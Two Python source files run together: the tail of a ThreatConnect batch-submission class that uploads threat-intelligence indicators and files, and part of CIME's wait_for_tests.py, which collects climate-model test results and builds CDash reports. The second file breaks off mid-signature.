"""Return previously saved xids."""
if self._saved_xids is None:
self._saved_xids = []
if self.debug:
if os.path.isfile(self.debug_path_xids) and os.access(
self.debug_path_xids, os.R_OK
):
with open(self.debug_path_xids) as fh:
self._saved_xids = fh.read().splitlines()
return self._saved_xids
@saved_xids.setter
def saved_xids(self, xid: str):
"""Append xid to xids saved file."""
with open(self.debug_path_xids, 'a') as fh:
fh.write(f'{xid}\n')
@property
def settings(self) -> dict:
"""Return batch job settings."""
_settings = {
'action': self._action,
# not supported in v2 batch
# 'attributeWriteType': self._attribute_write_type,
'attributeWriteType': 'Replace',
'haltOnError': str(self._halt_on_error).lower(),
'owner': self._owner,
'version': 'V2',
}
if self._playbook_triggers_enabled is not None:
_settings['playbookTriggersEnabled'] = str(self._playbook_triggers_enabled).lower()
if self._hash_collision_mode is not None:
_settings['hashCollisionMode'] = self._hash_collision_mode
if self._file_merge_mode is not None:
_settings['fileMergeMode'] = self._file_merge_mode
return _settings
def signature(
self, name: str, file_name: str, file_type: str, file_text: str, **kwargs
) -> Signature:
"""Add Signature data to Batch object.
Valid file_types:
+ Snort ®
+ Suricata
+ YARA
+ ClamAV ®
+ OpenIOC
+ CybOX ™
+ Bro
+ Regex
+ SPL - Splunk ® Search Processing Language
Args:
name: The name for this Group.
file_name: The name for the attached signature for this Group.
file_type: The signature type for this Group.
file_text: The signature content for this Group.
date_added (str, kwargs): The date timestamp the Group was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Signature: An instance of the Signature class.
"""
group_obj = Signature(name, file_name, file_type, file_text, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def submit(
self,
poll: Optional[bool] = True,
errors: Optional[bool] = True,
process_files: Optional[bool] = True,
halt_on_error: Optional[bool] = True,
) -> dict:
"""Submit Batch request to ThreatConnect API.
By default this method will submit the job request and data; if the size of the data
is below the **synchronousBatchSaveLimit** value set in System Settings, the request
is processed synchronously and the batch status is returned. If the size of the batch
is greater than that value, the batch job will be queued.
Errors are not retrieved automatically and need to be enabled.
If any of the submit, poll, or error methods fail, the entire submit will halt at the
point of failure. This behavior can be changed by setting halt_on_error to False.
Each of these methods can also be called on their own for greater control of the submit
process.
Args:
poll: If True poll batch for status.
errors: If True retrieve any batch errors (only if poll is True).
process_files: If True send any document or report attachments to the API.
halt_on_error: If True any exception will raise an error.
Returns:
dict: The Batch Status from the ThreatConnect API.
"""
# get file, group, and indicator data
content = self.data
# pop any file content to pass to submit_files
file_data = content.pop('file', {})
batch_data = (
self.submit_create_and_upload(content=content, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus', {})
)
batch_id = batch_data.get('id')
if batch_id is not None:
self.tcex.log.info(f'feature=batch, event=submit, batch-id={batch_id}')
# job hit queue
if poll:
# poll for status
batch_data = (
self.poll(batch_id=batch_id, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus')
)
if errors:
# retrieve errors
error_groups = batch_data.get('errorGroupCount', 0)
error_indicators = batch_data.get('errorIndicatorCount', 0)
if error_groups > 0 or error_indicators > 0:
batch_data['errors'] = self.errors(batch_id)
else:
# can't process files if status is unknown (polling must be enabled)
process_files = False
if process_files:
# submit file data after batch job is complete
self._file_threads.append(
self.submit_thread(
name='submit-files', target=self.submit_files, args=(file_data, halt_on_error,),
)
)
return batch_data
def submit_all(
self,
poll: Optional[bool] = True,
errors: Optional[bool] = True,
process_files: Optional[bool] = True,
halt_on_error: Optional[bool] = True,
) -> dict:
"""Submit Batch request to ThreatConnect API.
By default this method will submit the job request and data; if the size of the data
is below the **synchronousBatchSaveLimit** value set in System Settings, the request
is processed synchronously and the batch status is returned. If the size of the batch
is greater than that value, the batch job will be queued.
Errors are not retrieved automatically and need to be enabled.
If any of the submit, poll, or error methods fail, the entire submit will halt at the
point of failure. This behavior can be changed by setting halt_on_error to False.
Each of these methods can also be called on their own for greater control of the submit
process.
Args:
poll: If True poll batch for status.
errors: If True retrieve any batch errors (only if poll is True).
process_files: If True send any document or report attachments to the API.
halt_on_error: If True any exception will raise an error.
Returns:
dict: The Batch Status from the ThreatConnect API.
"""
batch_data_array = []
file_data = {}
while True:
batch_data = {}
batch_id = None
# get file, group, and indicator data
content = self.data
# break loop when end of data is reached
if not content.get('group') and not content.get('indicator'):
break
if self.action.lower() == 'delete':
# no need to process files on a delete batch job
process_files = False
# while waiting on an FR for delete support in createAndUpload, submit the delete
# request the old way (submit job + submit data), still using V2.
if len(content) > 0: # pylint: disable=len-as-condition
batch_id = self.submit_job(halt_on_error)
if batch_id is not None:
batch_data = self.submit_data(
batch_id=batch_id, content=content, halt_on_error=halt_on_error
)
else:
batch_data = {}
else:
# pop any file content to pass to submit_files
file_data = content.pop('file', {})
batch_data = (
self.submit_create_and_upload(content=content, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus', {})
)
batch_id = batch_data.get('id')
if batch_id is not None:
self.tcex.log.info(f'feature=batch, event=status, batch-id={batch_id}')
# job hit queue
if poll:
# poll for status
batch_data = (
self.poll(batch_id, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus')
)
if errors:
# retrieve errors
error_count = batch_data.get('errorCount', 0)
error_groups = batch_data.get('errorGroupCount', 0)
error_indicators = batch_data.get('errorIndicatorCount', 0)
if error_count > 0 or error_groups > 0 or error_indicators > 0:
batch_data['errors'] = self.errors(batch_id)
else:
# can't process files if status is unknown (polling must be enabled)
process_files = False
if process_files:
# submit file data after batch job is complete
self._file_threads.append(
self.submit_thread(
name='submit-files',
target=self.submit_files,
args=(file_data, halt_on_error,),
)
)
batch_data_array.append(batch_data)
# write errors for debugging
self.write_error_json(batch_data.get('errors'))
return batch_data_array
def submit_callback(
self,
callback: Callable[..., Any],
content: Optional[dict] = None,
halt_on_error: Optional[bool] = True,
) -> bool:
"""Submit batch data to ThreatConnect and poll in a separate thread.
The "normal" submit methods run in serial which will block when the batch poll is running.
Using this method the submit is done in serial, but the poll method is run in a thread,
which should allow the App to continue downloading and processing data while the batch
poll process is running. Only one batch submission is allowed at a time so that any
critical errors returned from batch can be handled before submitting a new batch job.
Args:
callback: The callback method that will handle
the batch status when polling is complete.
content: The dict of groups and indicator data (e.g., {"group": [], "indicator": []}).
halt_on_error: If True the process should halt if any errors are encountered.
Raises:
RuntimeError: Raised on invalid callback method.
Returns:
bool: False when there is no data to process, else True.
"""
# user provided content or grab content from local group/indicator lists
if content is not None:
# process content
pass
else:
content = self.data
file_data = content.pop('file', {})
# return False when end of data is reached
if not content.get('group') and not content.get('indicator'):
return False
# block here if there is already a batch submission being processed
if hasattr(self._submit_thread, 'is_alive'):
self.tcex.log.info(
'feature=batch, event=progress, status=blocked, '
f'is-alive={self._submit_thread.is_alive()}'
)
self._submit_thread.join()
self.tcex.log.debug(
'feature=batch, event=progress, status=released, '
f'is-alive={self._submit_thread.is_alive()}'
)
# submit the data and collect the response
batch_data: dict = (
self.submit_create_and_upload(content=content, halt_on_error=halt_on_error)
.get('data', {})
.get('batchStatus', {})
)
self.tcex.log.trace(f'feature=batch, event=submit-callback, batch-data={batch_data}')
# launch batch polling in a thread
self._submit_thread = self.submit_thread(
name='submit-poll',
target=self.submit_callback_thread,
args=(batch_data, callback, file_data),
)
return True
def submit_callback_thread(
self,
batch_data: dict,
callback: Callable[..., Any],
file_data: dict,
halt_on_error: Optional[bool] = True,
) -> None:
"""Submit data in a thread."""
batch_id = batch_data.get('id')
self.tcex.log.info(f'feature=batch, event=progress, batch-id={batch_id}')
if batch_id:
# when batch_id is None it indicates that batch submission was small enough to be
# processed inline (without being queued)
# poll for status
batch_status = (
self.poll(batch_id, halt_on_error=halt_on_error).get('data', {}).get('batchStatus')
)
# retrieve errors
error_count = batch_status.get('errorCount', 0)
error_groups = batch_status.get('errorGroupCount', 0)
error_indicators = batch_status.get('errorIndicatorCount', 0)
if error_count > 0 or error_groups > 0 or error_indicators > 0:
batch_status['errors'] = self.errors(batch_id)
else:
batch_status = batch_data
# launch file upload in a thread *after* batch status is returned. while only one batch
# submission thread is allowed, there is no limit on file upload threads. the upload
# status returned by file upload will be ignored when running in a thread.
if file_data:
self._file_threads.append(
self.submit_thread(
name='submit-files', target=self.submit_files, args=(file_data, halt_on_error,),
)
)
# send batch_status to callback
if callable(callback):
self.tcex.log.debug('feature=batch, event=calling-callback')
try:
callback(batch_status)
except Exception as e:
self.tcex.log.warning(f'feature=batch, event=callback-error, err="""{e}"""')
def submit_create_and_upload(self, content: dict, halt_on_error: Optional[bool] = True) -> dict:
"""Submit Batch request to ThreatConnect API.
Args:
content: The dict of groups and indicator data.
halt_on_error: If True the process should halt if any errors are encountered.
Returns:
dict: The Batch Status from the ThreatConnect API.
"""
# check global setting for override
if self.halt_on_batch_error is not None:
halt_on_error = self.halt_on_batch_error
# special code for debugging App using batchV2.
self.write_batch_json(content)
# store the length of the batch data to use for poll interval calculations
self.tcex.log.info(
'''feature=batch, event=submit-create-and-upload, type=group, '''
f'''count={len(content.get('group')):,}'''
)
self.tcex.log.info(
'''feature=batch, event=submit-create-and-upload, type=indicator, '''
f'''count={len(content.get('indicator')):,}'''
)
try:
files = (('config', json.dumps(self.settings)), ('content', json.dumps(content)))
params = {'includeAdditional': 'true'}
r = self.tcex.session.post('/v2/batch/createAndUpload', files=files, params=params)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)
return r.json()
except Exception as e:
self.tcex.handle_error(10505, [e], halt_on_error)
return {}
def submit_data(
self, batch_id: int, content: dict, halt_on_error: Optional[bool] = True
) -> dict:
"""Submit Batch request to ThreatConnect API.
Args:
batch_id: The batch id of the current job.
content: The dict of groups and indicator data.
halt_on_error: If True the process should halt if any errors are encountered.
Returns:
dict: The response data
"""
# check global setting for override
if self.halt_on_batch_error is not None:
halt_on_error = self.halt_on_batch_error
# store the length of the batch data to use for poll interval calculations
self._batch_data_count = len(content.get('group')) + len(content.get('indicator'))
self.tcex.log.info(
f'feature=batch, action=submit-data, batch-size={self._batch_data_count:,}'
)
headers = {'Content-Type': 'application/octet-stream'}
try:
r = self.tcex.session.post(f'/v2/batch/{batch_id}', headers=headers, json=content)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(10525, [r.status_code, r.text], halt_on_error)
return r.json()
except Exception as e:
self.tcex.handle_error(10520, [e], halt_on_error)
return None
def submit_files(self, file_data: dict, halt_on_error: Optional[bool] = True) -> dict:
"""Submit Files for Documents and Reports to ThreatConnect API.
Critical Errors
* There is insufficient document storage allocated to this account.
Args:
file_data: The file data to be submitted.
halt_on_error: If True any exception will raise an error.
Returns:
dict: The upload status for each xid.
"""
# check global setting for override
if self.halt_on_file_error is not None:
halt_on_error = self.halt_on_file_error
upload_status = []
self.tcex.log.info(f'feature=batch, action=submit-files, count={len(file_data)}')
for xid, content_data in list(file_data.items()):
del file_data[xid]  # win or lose, remove the entry
status = True
# used for debug/testing to prevent upload of previously uploaded file
if self.debug and xid in self.saved_xids:
self.tcex.log.debug(
f'feature=batch-submit-files, action=skip-previously-saved-file, xid={xid}'
)
continue
# process the file content
content = content_data.get('fileContent')
if callable(content):
try:
content_callable_name = getattr(content, '__name__', repr(content))
self.tcex.log.trace(
f'feature=batch-submit-files, method={content_callable_name}, xid={xid}'
)
content = content_data.get('fileContent')(xid)
except Exception as e:
self.tcex.log.warning(
f'feature=batch, event=file-download-exception, err="""{e}"""'
)
if content is None:
upload_status.append({'uploaded': False, 'xid': xid})
self.tcex.log.warning(f'feature=batch-submit-files, xid={xid}, event=content-null')
continue
api_branch = 'documents'
if content_data.get('type') == 'Report':
api_branch = 'reports'
if self.debug and content_data.get('fileName'):
# special code for debugging App using batchV2.
fqfn = os.path.join(
self.debug_path_files,
f'''{api_branch}--{xid}--{content_data.get('fileName').replace('/', ':')}''',
)
with open(fqfn, 'wb') as fh:
if not isinstance(content, bytes):
content = content.encode()
fh.write(content)
# Post File
url = f'/v2/groups/{api_branch}/{xid}/upload'
headers = {'Content-Type': 'application/octet-stream'}
params = {'owner': self._owner, 'updateIfExists': 'true'}
r = self.submit_file_content('POST', url, content, headers, params, halt_on_error)
if r.status_code == 401:
# use PUT method if file already exists
self.tcex.log.info('feature=batch, event=401-from-post, action=switch-to-put')
r = self.submit_file_content('PUT', url, content, headers, params, halt_on_error)
if not r.ok:
status = False
self.tcex.handle_error(585, [r.status_code, r.text], halt_on_error)
elif self.debug and self.enable_saved_file and xid not in self.saved_xids:
# save xid "if" successfully uploaded and not already saved
self.saved_xids = xid
self.tcex.log.info(
f'feature=batch, event=file-upload, status={r.status_code}, '
f'xid={xid}, remaining={len(file_data)}'
)
upload_status.append({'uploaded': status, 'xid': xid})
return upload_status
def submit_file_content(
self,
method: str,
url: str,
data: Union[bytes, str],
headers: dict,
params: dict,
halt_on_error: Optional[bool] = True,
) -> object:
"""Submit File Content for Documents and Reports to ThreatConnect API.
Args:
method: The HTTP method for the request (POST, PUT).
url: The URL for the request.
data: The body (data) for the request.
headers: The headers for the request.
params: The query string parameters for the request.
halt_on_error: If True any exception will raise an error.
Returns:
requests.models.Response: The response from the request.
"""
r = None
try:
r = self.tcex.session.request(method, url, data=data, headers=headers, params=params)
except Exception as e:
self.tcex.handle_error(580, [e], halt_on_error)
return r
def submit_job(self, halt_on_error: Optional[bool] = True) -> int:
"""Submit Batch request to ThreatConnect API.
Args:
halt_on_error: If True any exception will raise an error.
Returns:
int: The batch id from the API response.
"""
# check global setting for override
if self.halt_on_batch_error is not None:
halt_on_error = self.halt_on_batch_error
try:
r = self.tcex.session.post('/v2/batch', json=self.settings)
except Exception as e:
self.tcex.handle_error(10505, [e], halt_on_error)
if not r.ok or 'application/json' not in r.headers.get('content-type', ''):
self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)
data = r.json()
if data.get('status') != 'Success':
self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)
self.tcex.log.debug(f'feature=batch, event=submit-job, status={data}')
return data.get('data', {}).get('batchId')
def submit_thread(
self,
name: str,
target: Callable[[], bool],
args: Optional[tuple] = None,
kwargs: Optional[dict] = None,
) -> Optional[threading.Thread]:
"""Start a submit thread.
Args:
name: The name of the thread.
target: The method to call for the thread.
args: The args to pass to the target method.
kwargs: The keyword args to pass to the target method.
Returns:
threading.Thread: The started thread, or None if the thread failed to start.
"""
self.tcex.log.info(f'feature=batch, event=submit-thread, name={name}')
args = args or ()
t = None
try:
t = threading.Thread(name=name, target=target, args=args, kwargs=kwargs, daemon=True)
t.start()
except Exception:
self.tcex.log.trace(traceback.format_exc())
return t
def threat(self, name: str, **kwargs) -> Threat:
"""Add Threat data to Batch object
Args:
name: The name for this Group.
date_added (str, kwargs): The date timestamp the Indicator was created.
xid (str, kwargs): The external id for this Group.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Threat: An instance of the Threat class.
"""
group_obj = Threat(name, **kwargs)
return self._group(group_obj, kwargs.get('store', True))
def user_agent(self, text: str, **kwargs) -> UserAgent:
"""Add User Agent data to Batch object
Args:
text: The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
UserAgent: An instance of the UserAgent class.
"""
indicator_obj = UserAgent(text, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def url(self, text: str, **kwargs) -> URL:
"""Add URL Address data to Batch object.
Args:
text (str): The value for this Indicator.
confidence (str, kwargs): The threat confidence for this Indicator.
date_added (str, kwargs): The date timestamp the Indicator was created.
last_modified (str, kwargs): The date timestamp the Indicator was last modified.
rating (str, kwargs): The threat rating for this Indicator.
xid (str, kwargs): The external id for this Indicator.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
URL: An instance of the URL class.
"""
indicator_obj = URL(text, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def write_error_json(self, errors: list) -> None:
"""Write the errors to a JSON file for debuging purposes.
Args:
errors: A list of errors to write out.
"""
if self.debug:
if not errors:
errors = []
# get timestamp as a string without decimal place and consistent length
timestamp = str(int(time.time() * 10000000))
error_json_file = os.path.join(self.debug_path_batch, f'errors-{timestamp}.json.gz')
with gzip.open(error_json_file, mode='wt', encoding='utf-8') as fh:
json.dump(errors, fh)
def write_batch_json(self, content: dict) -> None:
"""Write batch json data to a file."""
if self.debug and content:
# get timestamp as a string without decimal place and consistent length
timestamp = str(int(time.time() * 10000000))
batch_json_file = os.path.join(self.debug_path_batch, f'batch-{timestamp}.json.gz')
with gzip.open(batch_json_file, mode='wt', encoding='utf-8') as fh:
json.dump(content, fh)
@property
def group_len(self) -> int:
"""Return the number of current groups."""
return len(self.groups) + len(self.groups_shelf)
@property
def indicator_len(self) -> int:
"""Return the number of current indicators."""
return len(self.indicators) + len(self.indicators_shelf)
def __len__(self) -> int:
"""Return the number of groups and indicators."""
return self.group_len + self.indicator_len
def __str__(self) -> str: # pragma: no cover
"""Return string represtentation of object."""
groups = []
for group_data in self.groups.values():
if isinstance(group_data, dict):
groups.append(group_data)
else:
groups.append(group_data.data)
for group_data in self.groups_shelf.values():
if isinstance(group_data, dict):
groups.append(group_data)
else:
groups.append(group_data.data)
indicators = []
for indicator_data in self.indicators.values():
if isinstance(indicator_data, dict):
indicators.append(indicator_data)
else:
indicators.append(indicator_data.data)
for indicator_data in self.indicators_shelf.values():
if isinstance(indicator_data, dict):
indicators.append(indicator_data)
else:
indicators.append(indicator_data.data)
data = {'group': groups, 'indicators': indicators}
return json.dumps(data, indent=4, sort_keys=True)
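# A minimal usage sketch for the Batch flow defined above, assuming a configured TcEx
# instance whose batch() factory returns an instance of this class; the function name,
# owner, and content values below are illustrative placeholders, not part of the API.
def example_batch_submit(tcex):
    """Build a small batch and submit it, polling for status."""
    batch = tcex.batch(owner='MyOrg')  # assumed factory for this Batch class
    # add indicator and group content using the helper methods defined above
    batch.url('https://example.com/bad', rating='3', confidence='75')
    batch.report('Example Report', file_name='report.pdf',
                 file_content=lambda xid: b'report-bytes')
    batch.threat('Example Threat')
    # submit() uses /v2/batch/createAndUpload; small jobs may complete synchronously,
    # larger jobs are queued and then polled (see the submit() docstring above)
    return batch.submit(poll=True, errors=True)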
|
wait_for_tests.py
|
#pylint: disable=import-error
from six.moves import queue
import os, time, threading, socket, signal, shutil, glob
#pylint: disable=import-error
from distutils.spawn import find_executable
import logging
import xml.etree.ElementTree as xmlet
import CIME.utils
from CIME.utils import expect, Timeout, run_cmd_no_fail, safe_copy
from CIME.XML.machines import Machines
from CIME.test_status import *
SIGNAL_RECEIVED = False
E3SM_MAIN_CDASH = "ACME_Climate"
CDASH_DEFAULT_BUILD_GROUP = "ACME_Latest"
SLEEP_INTERVAL_SEC = .1
###############################################################################
def signal_handler(*_):
###############################################################################
global SIGNAL_RECEIVED
SIGNAL_RECEIVED = True
###############################################################################
def set_up_signal_handlers():
###############################################################################
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
###############################################################################
def get_test_time(test_path):
###############################################################################
ts = TestStatus(test_dir=test_path)
comment = ts.get_comment(RUN_PHASE)
if comment is None or "time=" not in comment:
logging.warning("No run-phase time data found in {}".format(test_path))
return 0
else:
time_data = [token for token in comment.split() if token.startswith("time=")][0]
return int(time_data.split("=")[1])
###############################################################################
def get_test_output(test_path):
###############################################################################
output_file = os.path.join(test_path, "TestStatus.log")
if (os.path.exists(output_file)):
return open(output_file, 'r').read()
else:
logging.warning("File '{}' not found".format(output_file))
return ""
###############################################################################
def create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname):
###############################################################################
# We assume all cases were created from the same code repo
first_result_case = os.path.dirname(list(results.items())[0][1][0])
try:
srcroot = run_cmd_no_fail("./xmlquery --value CIMEROOT", from_dir=first_result_case)
except:
# Use repo containing this script as last resort
srcroot = CIME.utils.get_cime_root()
git_commit = CIME.utils.get_current_commit(repo=srcroot)
data_rel_path = os.path.join("Testing", utc_time)
site_elem = xmlet.Element("Site")
if ("JENKINS_START_TIME" in os.environ):
time_info_str = "Total testing time: {:d} seconds".format(int(current_time) - int(os.environ["JENKINS_START_TIME"]))
else:
time_info_str = ""
site_elem.attrib["BuildName"] = cdash_build_name
site_elem.attrib["BuildStamp"] = "{}-{}".format(utc_time, cdash_build_group)
site_elem.attrib["Name"] = hostname
site_elem.attrib["OSName"] = "Linux"
site_elem.attrib["Hostname"] = hostname
site_elem.attrib["OSVersion"] = "Commit: {}{}".format(git_commit, time_info_str)
testing_elem = xmlet.SubElement(site_elem, "Testing")
start_date_time_elem = xmlet.SubElement(testing_elem, "StartDateTime")
start_date_time_elem.text = time.ctime(current_time)
start_test_time_elem = xmlet.SubElement(testing_elem, "StartTestTime")
start_test_time_elem.text = str(int(current_time))
test_list_elem = xmlet.SubElement(testing_elem, "TestList")
for test_name in sorted(results):
test_elem = xmlet.SubElement(test_list_elem, "Test")
test_elem.text = test_name
for test_name in sorted(results):
test_path, test_status = results[test_name]
test_passed = test_status == TEST_PASS_STATUS
test_norm_path = test_path if os.path.isdir(test_path) else os.path.dirname(test_path)
full_test_elem = xmlet.SubElement(testing_elem, "Test")
if (test_passed):
full_test_elem.attrib["Status"] = "passed"
elif (test_status == NAMELIST_FAIL_STATUS):
full_test_elem.attrib["Status"] = "notrun"
else:
full_test_elem.attrib["Status"] = "failed"
name_elem = xmlet.SubElement(full_test_elem, "Name")
name_elem.text = test_name
path_elem = xmlet.SubElement(full_test_elem, "Path")
path_elem.text = test_norm_path
full_name_elem = xmlet.SubElement(full_test_elem, "FullName")
full_name_elem.text = test_name
xmlet.SubElement(full_test_elem, "FullCommandLine")
# text ?
results_elem = xmlet.SubElement(full_test_elem, "Results")
named_measurements = (
("text/string", "Exit Code", test_status),
("text/string", "Exit Value", "0" if test_passed else "1"),
("numeric_double", "Execution Time", str(get_test_time(test_norm_path))),
("text/string", "Completion Status", "Not Completed" if test_status == TEST_PEND_STATUS else "Completed"),
("text/string", "Command line", "create_test")
)
for type_attr, name_attr, value in named_measurements:
named_measurement_elem = xmlet.SubElement(results_elem, "NamedMeasurement")
named_measurement_elem.attrib["type"] = type_attr
named_measurement_elem.attrib["name"] = name_attr
value_elem = xmlet.SubElement(named_measurement_elem, "Value")
value_elem.text = value
measurement_elem = xmlet.SubElement(results_elem, "Measurement")
value_elem = xmlet.SubElement(measurement_elem, "Value")
value_elem.text = ''.join([item for item in get_test_output(test_norm_path) if ord(item) < 128])
elapsed_time_elem = xmlet.SubElement(testing_elem, "ElapsedMinutes")
elapsed_time_elem.text = "0" # Skip for now
etree = xmlet.ElementTree(site_elem)
etree.write(os.path.join(data_rel_path, "Test.xml"))
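# Illustrative shape of the `results` mapping consumed by the CDash helpers in this
# module, derived from how they index it: test name -> (path to the test's TestStatus
# file or case directory, overall status). Test names and paths are placeholders.
def _example_cdash_results():
    return {
        "SMS.f19_g16.A.melvin_gnu": ("/scratch/tests/SMS.f19_g16.A.melvin_gnu/TestStatus", TEST_PASS_STATUS),
        "ERS.f19_g16.B.melvin_gnu": ("/scratch/tests/ERS.f19_g16.B.melvin_gnu/TestStatus", TEST_FAIL_STATUS),
    }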
###############################################################################
def create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload):
###############################################################################
data_rel_path = os.path.join("Testing", utc_time)
try:
log_dir = "{}_logs".format(cdash_build_name)
need_to_upload = False
for test_name, test_data in results.items():
test_path, test_status = test_data
if test_status not in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS] or force_log_upload:
test_case_dir = os.path.dirname(test_path)
ts = TestStatus(test_case_dir)
build_status = ts.get_status(MODEL_BUILD_PHASE)
run_status = ts.get_status(RUN_PHASE)
baseline_status = ts.get_status(BASELINE_PHASE)
if build_status == TEST_FAIL_STATUS or run_status == TEST_FAIL_STATUS or baseline_status == TEST_FAIL_STATUS or force_log_upload:
case_dirs = [test_case_dir]
case_base = os.path.basename(test_case_dir)
test_case2_dir = os.path.join(test_case_dir, "case2", case_base)
if os.path.exists(test_case2_dir):
case_dirs.append(test_case2_dir)
for case_dir in case_dirs:
param = "EXEROOT" if build_status == TEST_FAIL_STATUS else "RUNDIR"
log_src_dir = run_cmd_no_fail("./xmlquery {} --value".format(param), from_dir=case_dir)
log_dst_dir = os.path.join(log_dir, "{}{}_{}_logs".format(test_name, "" if case_dir == test_case_dir else ".case2", param))
os.makedirs(log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*log*")):
safe_copy(log_file, log_dst_dir)
for log_file in glob.glob(os.path.join(log_src_dir, "*.cprnc.out*")):
safe_copy(log_file, log_dst_dir)
need_to_upload = True
if (need_to_upload):
tarball = "{}.tar.gz".format(log_dir)
if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_test_xml(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=True, # Important
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise SystemExit("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
